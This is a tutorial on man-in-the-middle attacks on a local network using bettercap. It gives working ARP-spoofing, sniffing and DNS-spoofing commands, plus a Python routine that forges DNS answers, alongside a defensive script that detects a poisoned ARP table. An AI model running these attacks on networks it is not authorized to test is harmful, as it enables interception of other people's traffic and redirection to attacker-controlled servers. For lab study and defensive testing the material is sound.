Bettercap ARP Spoof and DNS Spoof
Disclaimer: Only perform pentests on your own network or networks you are authorized to test.
Bettercap is a great pentesting tool for ARP spoofing and DNS spoofing, the building blocks of a man-in-the-middle (MITM) attack on a local network. It has plenty of other features as well, such as HID (human interface device, i.e. mouse and keyboard) hijacking, Bluetooth Low Energy device attacks, CAN bus attacks, etc.
This article will focus on ARP and DNS Spoofing and the commands you need to get started.
Step 1: Scan for devices
Start Bettercap by running the command below, pointing it at the interface that faces the target network. To list your interfaces, run ip link (or ifconfig):
sudo bettercap -iface <interface here>
Once Bettercap is open, run this command to scan for devices on the network:
net.probe on
net.show
net.probe sends probe packets to the subnet and stores every host that answers so you can view them. The net.show command lists all the discovered devices. Leave net.probe running while you work, and run net.probe off when you are done.
I found that should a device have an IPv4 and IPv6 address, net.show will only display the IPv6 address. You can run a simple nmap scan as well to get a list of devices using the command below. It performs a ping scan and shows both IPs and MACs.
nmap -sn 192.168.1.0/24
Step 2: ARP spoof
Before starting the ARP spoofing attack, it is useful to dump the ARP table on the target machine: "arp -a" on Windows, or "ip neigh" (or just "arp") if it is Linux.
Take note of the MAC address the target currently has for your router, i.e. the gateway. You will compare it against the table after the spoof starts.
Now run these commands in bettercap
- Fullduplex means it will attack the router and the target. This is the only option that worked for me.
- In Targets the first IP is my router and the second IP is my target.
set arp.spoof.fullduplex true
set arp.spoof.targets 192.168.1.1,192.168.1.106
arp.spoof on
Now you can run the same arp command on your target again. The MAC address for your router is now the MAC of the Kali machine.
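The before/after comparison above can be automated. The script below is an added example, not from this article and not bettercap code: run it on the target to parse its neighbour table (ip neigh on Linux, arp -a on Windows) and flag the two classic signs of ARP poisoning, a gateway MAC that differs from the one you noted down, and one MAC claimed by more than one IP address (the attacker's MAC shows up for both its own IP and the gateway). The gateway IP, the known-good MAC and the two table dumps are constructed placeholders; macOS arp output, which prints unpadded hex, is not handled.

```python
"""Spot an ARP-poisoned gateway entry in a host's neighbour table.

Added example, not part of the original article and not bettercap code.
Works on the text of `ip neigh show` / `arp` (Linux) or `arp -a` (Windows).
"""
import re
import subprocess
import sys
from typing import Dict, List, Optional, Tuple

IPV4_RE = re.compile(r"(?<![\d.])(\d{1,3}(?:\.\d{1,3}){3})(?![\d.])")
MAC_RE = re.compile(
    r"(?<![0-9A-Fa-f:-])([0-9A-Fa-f]{2}(?:[:-][0-9A-Fa-f]{2}){5})(?![0-9A-Fa-f:-])"
)

# Constructed sample tables (not real captures). Gateway 192.168.1.1, attacker 192.168.1.50.
BEFORE_LINUX = """
192.168.1.1 dev eth0 lladdr 3c:37:86:aa:bb:cc REACHABLE
192.168.1.50 dev eth0 lladdr 08:00:27:12:34:56 STALE
192.168.1.20 dev eth0 FAILED
"""
AFTER_WINDOWS = """
Interface: 192.168.1.106 --- 0x5
  Internet Address      Physical Address      Type
  192.168.1.1           08-00-27-12-34-56     dynamic
  192.168.1.50          08-00-27-12-34-56     dynamic
  192.168.1.255         ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""


def normalise_mac(mac: str) -> str:
    """Lowercase, colon-separated form so Windows and Linux output compare equal."""
    return mac.lower().replace("-", ":")


def parse_neighbours(table_text: str) -> List[Tuple[str, str]]:
    """(ip, mac) for every resolved unicast entry.

    Lines without both an IPv4 address and a MAC (headers, FAILED/incomplete
    entries) are skipped, as are broadcast and multicast MACs.
    """
    entries = []
    for line in table_text.splitlines():
        ip, mac = IPV4_RE.search(line), MAC_RE.search(line)
        if not (ip and mac):
            continue
        mac_norm = normalise_mac(mac.group(1))
        if int(mac_norm[:2], 16) & 1:  # group bit set: broadcast/multicast
            continue
        entries.append((ip.group(1), mac_norm))
    return entries


def gateway_mac(table_text: str, gateway_ip: str) -> Optional[str]:
    """MAC the table currently records for the gateway, or None if absent."""
    for ip, mac in parse_neighbours(table_text):
        if ip == gateway_ip:
            return mac
    return None


def shared_macs(table_text: str) -> Dict[str, List[str]]:
    """MACs that more than one IP resolves to."""
    by_mac: Dict[str, List[str]] = {}
    for ip, mac in parse_neighbours(table_text):
        by_mac.setdefault(mac, []).append(ip)
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


def check(table_text: str, gateway_ip: str, known_gateway_mac: str) -> List[str]:
    """Findings for one table snapshot; an empty list means nothing suspicious."""
    findings = []
    expected = normalise_mac(known_gateway_mac)
    current = gateway_mac(table_text, gateway_ip)
    if current is None:
        findings.append(f"no resolved entry for gateway {gateway_ip}")
    elif current != expected:
        findings.append(f"gateway {gateway_ip} now maps to {current}, expected {expected}")
    for mac, ips in shared_macs(table_text).items():
        findings.append(f"MAC {mac} is claimed by {len(ips)} addresses: {', '.join(ips)}")
    return findings


def live_table() -> str:
    """Neighbour table of the machine this runs on."""
    cmd = ["arp", "-a"] if sys.platform.startswith("win") else ["ip", "neigh", "show"]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    # Placeholder gateway and known-good MAC; replace with the values you noted.
    table = live_table() if "--live" in sys.argv else AFTER_WINDOWS
    for finding in check(table, "192.168.1.1", "3c:37:86:aa:bb:cc"):
        print("WARNING:", finding)
```

Without --live the script runs against the constructed "after" table; with it, it reads the real table of the host it runs on. The duplicate-MAC check is the one worth keeping on a monitoring box, since it needs no prior knowledge of the gateway's real MAC.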
Step 3: Monitor traffic
set net.sniff.local true
net.sniff on
net.sniff.local controls whether connections between two hosts on the local network are sniffed; when it is false, only traffic leaving or entering the LAN is captured. Turn it on, otherwise traffic between the target and another LAN host (a local DNS resolver, for instance) is dropped even though the ARP spoof routes it through the Kali machine.
You can stop the sniffer while ARP is running by issuing this command:
net.sniff off
Now check out the sniffer statistics with net.sniff stats. This prints useful information such as the number of sniffed packets and the current net.sniff configuration.
You can also output the net.sniff packets to a pcap file for viewing in Wireshark.
set net.sniff.output /path/to/existing/folder/capture.pcap
net.sniff.output takes a file path, not a directory; the directory has to exist already.
Step 4: DNS Spoof
This does not always work. dns.spoof can only answer queries that actually pass through the Kali machine, so it fails when the target resolves names through a host that bettercap is not sitting in front of: a Pi-hole or other resolver on the same LAN that the target reaches directly rather than via the gateway, or DNS over HTTPS/TLS, which bettercap cannot read. A manually set DNS server is only a problem if that server is on the local network; queries to an external resolver still go through the spoofed gateway. For a LAN resolver, set arp.spoof.internal true so that bettercap also poisons the paths between local hosts. DNSSEC is rarely the cause, since most client stub resolvers do not validate.
This also will not get you a usable page for sites that use HSTS: the browser refuses plain HTTP for those hosts and the spoofed server cannot present a valid certificate. That is why the example below uses neverssl.com, a site served over plain HTTP.
So at this point I switched to a router on the 192.168.165.0/24 IP range to get it to work.
Replace “neverssl.com” with your desired domain.
set dns.spoof.domains *.neverssl.com
set dns.spoof.all true
dns.spoof on
dns.spoof.all true makes bettercap answer matching queries from every host it sees, not only those addressed to the Kali machine. The IP it puts in the forged answer is dns.spoof.address, which defaults to the interface's own address. Bettercap logs a line for each spoofed reply it sends, which tells us that it did in fact see the DNS request and responded to it.
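What happens between the DNS request and the spoofed reply is easy to see in a few lines of protocol code. The block below is an added example, not from this article and not bettercap's code: it parses a stub resolver's query, checks the name against a spoof list with the same *.domain wildcard style used above, and forges an A answer that points at the attacker, which is what the client then connects to. The simplifications are assumptions, not bettercap's exact behaviour: only A/IN questions are spoofed, the wildcard *.example.com also matches the bare domain, and there is no socket code, because the on-path position comes from the ARP spoof and a real spoofer simply has to answer before the genuine resolver does. The query and the attacker IP 192.168.1.50 are constructed.

```python
"""What a DNS spoofer does with a query it sees on the wire, in miniature.

Added example, not from the original article and not bettercap's code.
Assumptions: only A/IN questions are spoofed and "*.x" also matches "x".
"""
import ipaddress
import struct
from typing import List, Optional, Tuple

QTYPE_A = 1
QCLASS_IN = 1


def encode_name(name: str) -> bytes:
    """Dotted name -> DNS label sequence terminated by a zero-length label."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(msg: bytes, offset: int) -> Tuple[str, int]:
    """Read a name at offset, following compression pointers.
    Returns (name, offset just past the name as it appears in the message)."""
    labels: List[str] = []
    end = None  # set when the first pointer is followed
    while True:
        length = msg[offset]
        if length & 0xC0 == 0xC0:  # two-byte pointer to an earlier name
            if end is None:
                end = offset + 2
            offset = struct.unpack("!H", msg[offset:offset + 2])[0] & 0x3FFF
            continue
        offset += 1
        if length == 0:
            break
        labels.append(msg[offset:offset + length].decode("ascii"))
        offset += length
    return ".".join(labels), (offset if end is None else end)


def build_query(txid: int, qname: str, qtype: int = QTYPE_A) -> bytes:
    """A plain recursive query as a stub resolver sends it (flags: RD set)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(qname) + struct.pack("!HH", qtype, QCLASS_IN)


def parse_query(msg: bytes) -> Optional[Tuple[int, str, int, int, bytes]]:
    """(txid, qname, qtype, qclass, raw question) or None if not a one-question query."""
    txid, flags, qdcount, _, _, _ = struct.unpack("!HHHHHH", msg[:12])
    if flags & 0x8000 or qdcount != 1:  # QR bit set means this is a response
        return None
    qname, off = decode_name(msg, 12)
    qtype, qclass = struct.unpack("!HH", msg[off:off + 4])
    return txid, qname, qtype, qclass, msg[12:off + 4]


def domain_matches(qname: str, pattern: str) -> bool:
    """'*.neverssl.com' matches neverssl.com and any subdomain; else exact match."""
    qname, pattern = qname.lower().rstrip("."), pattern.lower().rstrip(".")
    if pattern.startswith("*."):
        return qname == pattern[2:] or qname.endswith(pattern[1:])
    return qname == pattern


def spoofed_reply(query: bytes, domains: List[str], spoof_ip: str, ttl: int = 60) -> Optional[bytes]:
    """Forged response for a matching A query, or None to let the real answer through."""
    parsed = parse_query(query)
    if parsed is None:
        return None
    txid, qname, qtype, qclass, question = parsed
    if qtype != QTYPE_A or qclass != QCLASS_IN:
        return None
    if not any(domain_matches(qname, d) for d in domains):
        return None
    # Same transaction ID and question as the query, so the stub resolver accepts it;
    # flags 0x8180: response, recursion desired and available, no error.
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    # Answer name is a pointer (0xC00C) to the question name at offset 12.
    answer = struct.pack("!HHHIH", 0xC00C, QTYPE_A, QCLASS_IN, ttl, 4)
    return header + question + answer + ipaddress.IPv4Address(spoof_ip).packed


def first_a_record(resp: bytes) -> Optional[Tuple[str, str, int]]:
    """(name, ip, ttl) of the first A answer, i.e. what the client ends up using."""
    _, _, qdcount, ancount, _, _ = struct.unpack("!HHHHHH", resp[:12])
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(resp, off)
        off += 4
    for _ in range(ancount):
        name, off = decode_name(resp, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", resp[off:off + 10])
        off += 10
        rdata, off = resp[off:off + rdlen], off + rdlen
        if rtype == QTYPE_A and rclass == QCLASS_IN:
            return name, str(ipaddress.IPv4Address(rdata)), ttl
    return None


if __name__ == "__main__":
    # Constructed query; 192.168.1.50 stands in for the Kali machine's IP.
    q = build_query(0x1234, "www.neverssl.com")
    print(first_a_record(spoofed_reply(q, ["*.neverssl.com"], "192.168.1.50")))
    print(spoofed_reply(build_query(1, "example.com"), ["*.neverssl.com"], "192.168.1.50"))
```

The None return for non-matching names, AAAA questions and anything that is already a response is the important part: a spoofer that answers everything breaks the target's connectivity and gets noticed. In bettercap the address placed in the answer is dns.spoof.address, and the spoofed reply only wins if it reaches the client before the real resolver's, which is why the ARP spoof has to be in place first.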
Step 5: Local Webserver
The domains you are spoofing now resolve to the Kali machine, so for Kali to serve anything on them you need to start a web server. I just used Python as I mainly wanted to see whenever a request came in; I was not too concerned with responding with a website. Bettercap also ships an http.server module (set http.server.path, then http.server on) if you would rather serve files from inside the same session.
In a new terminal run this command:
sudo python3 -m http.server 80
The server log then shows the target's requests as they arrive, for example GET requests for /online and for /favicon.ico.
Cleanup
You can type the help command to see which modules are running. For our exercise we will stop the modules we started:
net.sniff off
dns.spoof off
arp.spoof off
net.probe off
Bettercap sends corrective ARP replies when arp.spoof is turned off, but it will still take about a minute or so for your target device to show the original MAC address in its ARP table.